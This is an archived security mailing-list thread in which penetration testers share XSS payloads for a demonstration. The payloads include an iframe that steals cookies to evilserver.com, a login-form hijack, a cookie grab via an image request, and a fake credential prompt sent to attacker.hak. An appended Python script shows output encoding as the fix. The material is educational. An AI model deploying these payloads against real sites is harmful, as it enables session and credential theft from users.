It won't be held online, but I plan to record and post it. Thanks for all
of the ideas, guys.

Adrian

On Fri, May 29, 2009 at 9:54 AM, packetjack <[email protected]> wrote:

> Sounds like a sweet presentation you're giving, Adrian. I agree, the
> <script>alert("XSS");</script> is so boring.  Kudos to you for making an
> interesting presentation! Is this an online presentation?  I'd love to see
> it if so!  I test webapps and often can prove a site is vuln due to the
> example given above, but I would like to learn some of the ways you and
> others mentioned, ones that will show upper mgt what this "little vuln" is
> capable of.....
> Mary
>
>
> On Fri, May 29, 2009 at 7:45 AM, Michael Douglas <[email protected]> wrote:
>
>> While all these samples are really fun, I've lately had great luck by
>> making two different XSS attacks when I'm showing folks.
>>
>> One for the devs -- this tends to be a bit more "fun" and does stuff
>> like click trapping.
>>
>> For marketing or the project managers -- the ones I've found most
>> likely to sweep these bugs under the rug -- I send them "brand damage"
>> examples.  (Cock ring size is freaking hilarious, but would send me to
>> HR).  So I do things like image swapping, or setting the background to
>> a LOLCat or a competitor logo.
>>
>> The all time XSS FTW moment was about 4 years ago now, when someone
>> found an XSS problem on a McDonald's site.  Their link was so damn
>> sweet, it's what got me interested in web app security.  When you
>> clicked it, you were sent to a page that had all the McD's wrappings but
>> the content section of the window was blank except for in lovely red
>> letters it said: "Hey FATTIE! You really shouldn't be eating our
>> food!"
>>
>>
>>
>> On Fri, May 29, 2009 at 3:35 AM,  <[email protected]> wrote:
>> > You could use a couple of typical password/cookie stealing examples.
>> >
>> > Cookie stealing iframe:
>> > "><IFRAME SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie"
>> > height="1" width="1" frameborder="0"></IFRAME>
>> >
>> > Altering the logon form:
>> > "><script>window.onload = function(){document.loginForm.action='http://evilserver.com/evil.php?details='}</script><!----
>> >
>> > I like to use the logon form example for my penetration testing
>> > presentations as it looks 100% normal to the user, except it redirects the
>> > Submit button to send the logon information (username/password in most
>> > cases) to your evilserver instead of the real server. You can also rewrite
>> > the code in the user's browser to remove password hashing to make it easier
>> > to get the clear text password. On the server end I usually just put up a
>> > Metasploit HTTP or a netcat listener on the evilserver.com address to output
>> > the traffic to a logfile. You can also log it to a database for mass farming
>> > of data, but we don't do that kind of thing, we leave that to Bob ;)
>> >
>> > If you want something evil on the client-side, try an iframe that references
>> > a PDF file. You can then export a PDF from Metasploit and embed the
>> > Meterpreter payload for total world domination.
>> >
>> > Chris John Riley
>> >
>> > [email protected]@inet wrote on 28.05.2009 20:50:39:
>> >
>> >> Ok, I've got yet another presentation coming up, this time on the OWASP
>> >> Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The
>> >> canonical example of course is:
>> >>
>> >> <script>alert("XSS");</script>
>> >>
>> >> but that is boring, and gives folks the impression that XSS is not that
>> >> serious.  Better short examples would be:
>> >>
>> >> Redirect traffic to your site:
>> >> <script>window.location = "http://www.irongeek.com/";</script>
>> >>
>> >> A little cookie grabbing:
>> >> <script>
>> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
>> >> </script>
>> >>
>> >> Or maybe a password form to make people think they have to login, but it
>> >> just grabs the credentials:
>> >> <script>
>> >> username=prompt('Please enter your username',' ');
>> >> password=prompt('Please enter your password',' ');
>> >> document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
>> >> </script>
>> >>
>> >> What are other cool things to inject, besides maybe BeEF, that show off how
>> >> XSS can be a big deal?
>> >>
>> >> Thanks,
>> >> Adrian
>> >> _______________________________________________
>> >> Pauldotcom mailing list
>> >> [email protected]
>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> >> Main Web Site: http://pauldotcom.com
>> > ----------------------------------------
>> > Raiffeisen Informatik GmbH, company register no. 88239p, Handelsgericht Wien,
>> > DVR 0486809, UID ATU 16351908
>> >
>> > Correspondence with above mentioned sender via e-mail is only for
>> > information purposes. This medium may not be used for exchange of
>> > legally-binding communications.
>> > ----------------------------------------
>> >
>> >
>> >
>>
>
>
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
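Every payload quoted in this thread (the `"><IFRAME ...` attribute breakout, the `window.onload` form rewrite, the `new Image().src` cookie grab) only works because the site reflects input unencoded. As an added example for defenders, not code from the thread, from Mutillidae or from any of the posters, here is a Python script that renders a hypothetical search page both the vulnerable and the hardened way and uses the standard-library HTML parser to show which elements each payload actually manages to inject. The template, the inputs and the `attacker.invalid` host names are constructed for the example.

```python
"""Context-aware output encoding versus the payload shapes quoted above.

Added example; not code from the Pauldotcom thread or from Mutillidae. It
assumes a hypothetical search page that reflects a user-supplied term twice:
inside a double-quoted attribute value and in the HTML body. Those are the
two contexts the '"><IFRAME ...' and '<script>...' payloads target.
"""
import html
from html.parser import HTMLParser

# Constructed inputs modelled on the payload shapes in the thread; the host
# names are placeholders (.invalid), not the ones quoted there.
SAMPLE_INPUTS = [
    "<script>alert(\"XSS\");</script>",
    "\"><IFRAME SRC=\"javascript:window.location='http://attacker.invalid/x?c='"
    "+document.cookie\" height=\"1\"></IFRAME>",
    "\"><script>window.onload=function(){document.loginForm.action="
    "'http://attacker.invalid/'}</script><!--",
    "plain search term & nothing else",
]

TEMPLATE_TAGS = {"input", "p"}  # the only elements the template itself emits


def render_vulnerable(term: str) -> str:
    """Reflects the term unencoded into both contexts: the bug being demoed."""
    return f'<input name="q" value="{term}"><p>Results for {term}</p>'


def render_hardened(term: str) -> str:
    """Encodes the term for each context before reflecting it.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so a
    leading double quote cannot close the value attribute early; quote=False
    is enough for text content, where only <, > and & are significant.
    """
    attr = html.escape(term, quote=True)
    body = html.escape(term, quote=False)
    return f'<input name="q" value="{attr}"><p>Results for {body}</p>'


class _TagCollector(HTMLParser):
    """Records the (lower-cased) name of every start tag the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def element_names(markup: str) -> set[str]:
    """Parses markup roughly the way a browser would and returns element names."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return set(collector.tags)


def injected_elements(markup: str) -> set[str]:
    """Elements present in the rendered page that the template never emits."""
    return element_names(markup) - TEMPLATE_TAGS


def audit(term: str) -> dict:
    """Compares both renderings of one input; handy inside a unit-test suite."""
    return {
        "vulnerable_injects": injected_elements(render_vulnerable(term)),
        "hardened_injects": injected_elements(render_hardened(term)),
    }


if __name__ == "__main__":
    for sample in SAMPLE_INPUTS:
        result = audit(sample)
        print(f"{sample[:38]!r:42} vulnerable={sorted(result['vulnerable_injects'])} "
              f"hardened={sorted(result['hardened_injects'])}")
```

The parser check is the point of the exercise: it demonstrates that the `">` prefix on two of the quoted payloads exists precisely to escape the attribute context, which is why encoding has to be chosen per context rather than applied once. The cookie-grabbing payloads have a second, independent mitigation that this script does not model: marking the session cookie `HttpOnly` keeps it out of `document.cookie` even when an injection does land.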
